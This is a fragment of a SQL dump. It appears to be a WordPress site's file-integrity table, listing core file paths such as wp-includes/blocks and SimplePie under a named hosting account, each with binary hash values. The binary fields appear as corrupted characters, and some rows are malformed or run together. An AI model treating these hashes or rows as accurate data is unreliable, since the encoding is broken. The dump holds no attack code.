WeHqQ6Z','',0,'?'),('=F_j1r.','wp-includes/Requests/src/Transport.php','/home/tummmyov/tummyrevolution.com/wp-includes/Requests/src/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\Z\0D\'','bKt1#ֱfEX{KGGMг','',0,'?'),('\Zף(&D%0h','wp-includes/Requests/src/Utility/CaseInsensitiveDictionary.php','/home/tummmyov/tummyrevolution.com/wp-includes/Requests/src/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W!pm5RHE)','Ҟ\0[U = b\Z^ճ','',0,'?'),(' Q\"0]ק EL@','wp-includes/Requests/src/Utility/FilteredIterator.php','/home/tummmyov/tummyrevolution.com/wp-includes/Requests/src/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c׵L{$G\\i','GdOu$A$6PCnts','',0,'?'),('kgaFz7','wp-includes/Requests/src/Utility/InputValidator.php','/home/tummmyov/tummyrevolution.com/wp-includes/Requests/src/Utility/InputValidator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\rʮYe Ll','a1Qau/dsLZvU','',0,'?'),('k5SHЫ','wp-includes/SimplePie/Author.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?hK\0k1N\"','N\\pt3+,l\'cOQ+Z','',0,'?'),('U\\p{JOQ&','wp-includes/SimplePie/Cache/Base.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bĞAʖ䦴j','oOw~9K4oY[Ke\\RG','',0,'?'),(',hɃs?4B[^՝','wp-includes/SimplePie/Cache/DB.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wM\rʍ|D','g#]\"h0Vq)0j%I','',0,'?'),('V,E@Xy','wp-includes/SimplePie/Cache/File.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P 8?Qh׊','~`嫌Jrhte','',0,'?'),('<)8T*.SuSĺ','wp-includes/SimplePie/Cache/MySQL.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',') fzC0',' WA2Lh`i%iv2޴','',0,'?'),('u!+\Z','wp-includes/SimplePie/Cache/Redis.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t]>e\n( 40','r*%P2I7\ZKaq#','',0,'?'),('Y֝U}r/','wp-includes/SimplePie/Cache.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ~ܯ{ʹ+h','mdnnunpU0 l6ZiR','',0,'?'),('\"ܒnzD','wp-includes/SimplePie/Caption.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊yuD\r£','\'W1Q5[ۋ)\r8۝5:?*)K','',0,'?'),(' qKUj','wp-includes/SimplePie/Category.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{[ ZVG4&','%N\0','\nS/̼#@%,ul$tT','',0,'?'),('anV=Ty X','wp-includes/SimplePie/Copyright.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k>ԪQ','i%ܴE^g2z,@QV','',0,'?'),('oǣ ףf0Y','wp-includes/SimplePie/Core.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ0)_S','760w8([oWK4d','',0,'?'),('ͽ3=OG|~','wp-includes/SimplePie/Credit.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.6K>.L','rٴ@c@{RCGd^>>E\Z ','',0,'?'),('POf;/','wp-includes/SimplePie/Decode/HTML/Entities.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jыp&yU','WP*P=Nϻ;\Zi82_ ','',0,'?'),('2^(ʭ-^x','wp-includes/SimplePie/Enclosure.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\'Gko','Z:\r}nZ`tj!Ll {bg','',0,'?'),('\nfv81-I','wp-includes/SimplePie/Exception.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗zqŔ /','_peNO/*mvȿn6*zon ','',0,'?'),('4r%j','wp-includes/SimplePie/File.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ʙZ\0(hKHR','8 ^VcÌ?ossS','',0,'?'),('Pط悇̺ƴ$@','wp-includes/SimplePie/HTTP/Parser.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P0ش57, z','&bB筢09Z/|1p','',0,'?'),('oZ0v2}Ea','wp-includes/SimplePie/Locator.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ږ_}3',' #L& $FΪK#\"`ԈMCWd','',0,'?'),('FFvV;v8/\r','wp-includes/SimplePie/Misc.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4P\riBBe','qѰɧӿlpK9 ^/t4,','',0,'?'),('MjAMO\"If','wp-includes/SimplePie/Net/IPv6.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r FE,h','pt[bmM_Iz\"[j/O','',0,'?'),('Bهv}Q(ab>\nFY+','',0,'?'),('}7 ޘDHDPl','wp-includes/SimplePie/Registry.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';M{ٟR','Ԧ0-/\\kW%oޏ\'E)D','',0,'?'),('\0`YϭrG','wp-includes/SimplePie/Restriction.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"~\'$|2*','>3 vj\r|\")\"5SR\0{k{6','',0,'?'),('[1YAdk,','wp-includes/SimplePie/Sanitize.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W,a4Vk66L','`QV;`_1pRF;','',0,'?'),('0lj0+%','wp-includes/SimplePie/Source.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aA:$]B-vw)','\"9MaU_hI>,]C','',0,'?'),('\'g!:H),','wp-includes/SimplePie/XML/Declaration/Parser.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O,@ۺa Δ','imQq+\r:Po\Z*','',0,'?'),('ZҌ[\nv F','wp-includes/SimplePie/gzdecode.php','/home/tummmyov/tummyrevolution.com/wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rF<\ZiǨu','|R\'gAEێqqT!:O0_','',0,'?'),('OhuG&\0L','wp-includes/Text/Diff/Engine/native.php','/home/tummmyov/tummyrevolution.com/wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kj JB','5lݲUgoK\\c-F`A{^{','',0,'?'),('ǂ-i).\\z^a','wp-includes/Text/Diff/Engine/shell.php','/home/tummmyov/tummyrevolution.com/wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tC& wB@','ݙ/H-/p4{De[%%NX','',0,'?'),('e^#|ۍTЩz','wp-includes/Text/Diff/Engine/xdiff.php','/home/tummmyov/tummyrevolution.com/wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^L4Xטo ','L\Z(M b;E.:)Cp','',0,'?'),('&Rw?~jhJD','wp-includes/Text/Diff/Renderer/inline.php','/home/tummmyov/tummyrevolution.com/wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2z;/Ï$m','x 2EZμ','',0,'?'),('3fQ3h5[W<','wp-includes/Text/Diff/Renderer.php','/home/tummmyov/tummyrevolution.com/wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w.֨\"&R<','[9#c2z\\\'?H1','',0,'?'),(']B#2zbU/','wp-includes/Text/Diff.php','/home/tummmyov/tummyrevolution.com/wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T4M\0\rR^>2\'','-RNw0\nQOn?dY!oKD','',0,'?'),('-kdϯXw\\7','wp-includes/admin-bar.php','/home/tummmyov/tummyrevolution.com/wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rA/ЇdwP]','\r5XÜ߭ϒ8-2','',0,'?'),('І$Hd+ػ','wp-includes/assets/script-loader-packages.min.php','/home/tummmyov/tummyrevolution.com/wp-includes/assets/script-loader-packages.min.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^aW$T','?2&Adm\'a7ew(\\(tG4','',0,'?'),('Otg\02\\B','wp-includes/assets/script-loader-packages.php','/home/tummmyov/tummyrevolution.com/wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LԈ\Z!>','Nؔ;?\r}ꖧ`!','',0,'?'),('6f7wcA\0','wp-includes/assets/script-loader-react-refresh-entry.min.php','/home/tummmyov/tummyrevolution.com/wp-includes/assets/script-loader-react-refresh-entry.min.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T9Q*%Mi~J',',ZH^-C*0AJD4&','',0,'?'),(':\Z`gI >P)','wp-includes/assets/script-loader-react-refresh-entry.php','/home/tummmyov/tummyrevolution.com/wp-includes/assets/script-loader-react-refresh-entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T9Q*%Mi~J',',ZH^-C*0AJD4&','',0,'?'),('Gdd́`w','wp-includes/assets/script-loader-react-refresh-runtime.min.php','/home/tummmyov/tummyrevolution.com/wp-includes/assets/script-loader-react-refresh-runtime.min.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"*,c$i','n4I Ya}+/Qn','',0,'?'),('hc!\\d/ \0L]sD','wp-includes/assets/script-loader-react-refresh-runtime.php','/home/tummmyov/tummyrevolution.com/wp-includes/assets/script-loader-react-refresh-runtime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"*,c$i','n4I Ya}+/Qn','',0,'?'),('Gu^/1ՁS7','wp-includes/atomlib.php','/home/tummmyov/tummyrevolution.com/wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZZA 2Ϡ,','+bt=U(._lb_P$W}','',0,'?'),('&S짿o$0n','wp-includes/author-template.php','/home/tummmyov/tummyrevolution.com/wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo\ro','i\n4SG\ZH3IxKݩ','',0,'?'),('DU}<޴D5Y','wp-includes/block-editor.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','..QɃGG|r',' UܧF?U^x7xu&t','',0,'?'),(')D','wp-includes/block-i18n.json','/home/tummmyov/tummyrevolution.com/wp-includes/block-i18n.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n! :D8','f\\tM&\r1 $u3 ','',0,'?'),('4)tkl#**?-T*H%9/EVyf','',0,'?'),('\0 $ә\0 ֫','wp-includes/block-patterns.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C/I3e>2','/ɔF}OɐFu?A','',0,'?'),('p}GJ$x','wp-includes/block-supports/align.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'joyJ','^{L7\\br;GτR;֒','',0,'?'),('pbA]%ꞢSV8','wp-includes/block-supports/background.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZZo nL)e\"֪','@RE h\\>(ӇH)}*.','',0,'?'),('CV%i','wp-includes/block-supports/border.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/border.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aGoM\\','\ZoJ(F\"c[-9乹\"W\rb\Z','',0,'?'),('g+,c','wp-includes/block-supports/colors.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g5+p','p8-6N rϖzf l','',0,'?'),('ŕoi|}','wp-includes/block-supports/custom-classname.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=FGrk9','{ͪ7*wz\rp3a3ꅧ7@','',0,'?'),(']J*ƒXRE','wp-includes/block-supports/dimensions.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/dimensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0;͊','S&\ZyVG(,V×/CEuX','',0,'?'),('HСYVhZ','wp-includes/block-supports/duotone.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/duotone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gdC3۫H@','ٺ+!`kg8Nfml\'6','',0,'?'),('j#ӲX%I','wp-includes/block-supports/elements.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','el7҈+۝.>','6!2 |֕__w*\Z AO/{','',0,'?'),('\nzŭ}{.u[','wp-includes/block-supports/generated-classname.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1HRO#/}','?!jCouc3eIB=\'/Ka','',0,'?'),('ڙy2D\na93','wp-includes/block-supports/layout.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vLe}(dd','l+?WQ\0&+egL ','',0,'?'),('ab*~gyy','wp-includes/block-supports/position.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P|⪭w$JD','ufUCq$qx+0l!26fX','',0,'?'),('N4ߏoݺ3^P','wp-includes/block-supports/settings.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ulY P8 bH\0','a\'MX0ݤ|\\nÉgFj','',0,'?'),('s񿉧}riS','wp-includes/block-supports/shadow.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/shadow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I(n[Q~\\fؤ9',']\0`0Q?NH\raϘj.yl','',0,'?'),('A+~/Ję4$Y*','wp-includes/block-supports/spacing.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0m%wz','լ5+\'-KKzhV \\MMF3PW','',0,'?'),('}O !ٶ]OO [','wp-includes/block-supports/typography.php','/home/tummmyov/tummyrevolution.com/wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H:UΡ6bYAU F .','wp-includes/blocks/archives.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fQ n,we',']aj.=ZpѓhFY','',0,'?'),('\\T@SO|m','wp-includes/blocks/audio/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wW\nJh`*A','BjOV]2rmӣ=P\n\Z(','',0,'?'),('la\'P_bm !p','wp-includes/blocks/audio/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')[J[7>','vܽZR}ZfG|-!TUswo4','',0,'?'),('܈y7@\"','wp-includes/blocks/audio/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P⋎m{tmo','}/14o|&X1ͦO8 7:a','',0,'?'),('9Ce;Y#v|z','wp-includes/blocks/audio/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~R0W@y_','vC~Qk[s2B\nǩza|n#','',0,'?'),('RܰoL8~\\lCR','wp-includes/blocks/audio/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z#@ϛ\0v','ͲCOR̋*','',0,'?'),('}|\0+N6]R','wp-includes/blocks/audio/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G^x[','^\ZV.~kZF(+Բ\n]tހB','',0,'?'),(' 2p<(X\"ݵ','wp-includes/blocks/audio/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HF[^','4K^<%_ױUbPTOΔT)!','',0,'?'),('?WZBDN1 3','wp-includes/blocks/audio/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G^x[','^\ZV.~kZF(+Բ\n]tހB','',0,'?'),('q2trۗ,]s*r','wp-includes/blocks/audio/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HF[^','4K^<%_ױUbPTOΔT)!','',0,'?'),('$Oqyܹ','wp-includes/blocks/audio/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nv+M#Oa','{߭ R#\nY5pN93+{','',0,'?'),('l;+SG','wp-includes/blocks/audio/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0ob~)8','v{GdT*ȡR[<4C','',0,'?'),(']И\n(?W&\\','wp-includes/blocks/audio/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nv+M#Oa','{߭ R#\nY5pN93+{','',0,'?'),('\n _{','wp-includes/blocks/audio/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/audio/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0ob~)8','v{GdT*ȡR[<4C','',0,'?'),('\ZtUR\r\"C','wp-includes/blocks/avatar/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\ZTٍ!Ʃ','x *YCNI˝rfbs,c','',0,'?'),(']_\Z?ʤwH o','wp-includes/blocks/avatar/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Rd-u','7oWݹP*\0ӛ^Ũt','',0,'?'),('^YKbF2TT-','wp-includes/blocks/avatar/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*( \ZIz','e2,ՔenCL]s +','',0,'?'),('z[Aky0c&','wp-includes/blocks/avatar/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Rd-u','7oWݹP*\0ӛ^Ũt','',0,'?'),('}BfkV=15lg','wp-includes/blocks/avatar/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*( \ZIz','e2,ՔenCL]s +','',0,'?'),('TړbIv}z5','wp-includes/blocks/avatar/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D||PyXG','~_8x~5K','W8\01W Sac)#\n77N','',0,'?'),('p4kcQ(0h','wp-includes/blocks/avatar/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D||PyXG','~_8x~5K','W8\01W Sac)#\n77N','',0,'?'),('G=u\nˮ\0V}','wp-includes/blocks/avatar.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/avatar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kߥ$=ȈX8',' \r̰n\rb5ATW)\";','',0,'?'),('72_RD;n','wp-includes/blocks/block/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D]nF8ۨlMF','\n}?DJ==^Եg','',0,'?'),('+kZ@bKҚ','wp-includes/blocks/block/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/block/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_fe9SdRW','Zg$,:3;Q0Ճ ','',0,'?'),('cO-+oe','wp-includes/blocks/block/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/block/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uZ`ن^^^6,','`TuCdJm','',0,'?'),('͗~qyL*>','wp-includes/blocks/block/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/block/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_fe9SdRW','Zg$,:3;Q0Ճ ','',0,'?'),('5ˏ.y2Q[ڣ1','wp-includes/blocks/block.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6xS8Mš','zmsy2^5kS*IIwbaC','',0,'?'),('\n\"\'࡛ܹ','wp-includes/blocks/blocks-json.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/blocks-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','85\"uI` j','VXlxOVɵ%=]Qb/','',0,'?'),(' wT','wp-includes/blocks/button/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oƵ\\\\.','xU\0k>̛ʽaOZ!&DM','',0,'?'),('.=$.6(','wp-includes/blocks/button/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{{Y;etsS',' UB$:<(.\nQ_%뇸]','',0,'?'),('c6~6̐','wp-includes/blocks/button/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<XB DMѭ','ۥy.*E׈u7əw#W','',0,'?'),('$b o&8','wp-includes/blocks/button/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' [Zy ','tsAUHy@,u|\r\\(/cU','',0,'?'),('X2FGrmF','wp-includes/blocks/button/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^sbB/?','#\ZûR/>O`T\"WJd','',0,'?'),('~Pfԩ~1LYw ','wp-includes/blocks/button/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(tP-/h','Iqd,t Kanv״w','',0,'?'),('<hiѭ3* Fq','wp-includes/blocks/button/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[}MeA','KP1(Ҍ/D^B&U#kyY','',0,'?'),('(9l15nq','wp-includes/blocks/button/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}T/A','0U\")\nD@1RH*{Y=_','',0,'?'),('7ʏaBKz','wp-includes/blocks/button/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/button/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Cp','3ߝ_7HӨ2=픀[d','',0,'?'),('Z\Z5\nj}@','wp-includes/blocks/buttons/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǵ UbhI','\n4\ZA\\!fBU~J{V@,=K^ ','',0,'?'),('5ĺ%','wp-includes/blocks/buttons/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¬>uY*','/-(y$g2','',0,'?'),('t U iާ\"s','wp-includes/blocks/buttons/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n;N[JOM','*>߸7@&lmwcؔ\0Q<','',0,'?'),('v.#PH2','wp-includes/blocks/buttons/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¬>uY*','/-(y$g2','',0,'?'),('q%)ud ','wp-includes/blocks/buttons/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n;N[JOM','*>߸7@&lmwcؔ\0Q<','',0,'?'),('?8RmТE7h<','wp-includes/blocks/buttons/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\u*52F','ۨ\rWd A! OIRkD*','',0,'?'),('h8ʯn- *','wp-includes/blocks/buttons/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}!r<','ն,*͖>3x\r6K5','',0,'?'),(',d$\\Zޟ^Wu','wp-includes/blocks/buttons/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\u*52F','ۨ\rWd A! 